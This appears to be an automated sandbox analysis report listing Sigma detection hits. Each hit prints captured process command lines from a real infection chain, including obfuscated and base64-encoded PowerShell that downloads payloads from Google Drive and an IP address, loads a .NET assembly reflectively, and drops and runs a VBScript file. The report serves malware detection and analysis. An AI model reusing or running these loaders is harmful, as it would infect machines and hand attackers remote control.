[System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativad

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativad

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, ProcessId: 7988, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhz

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; 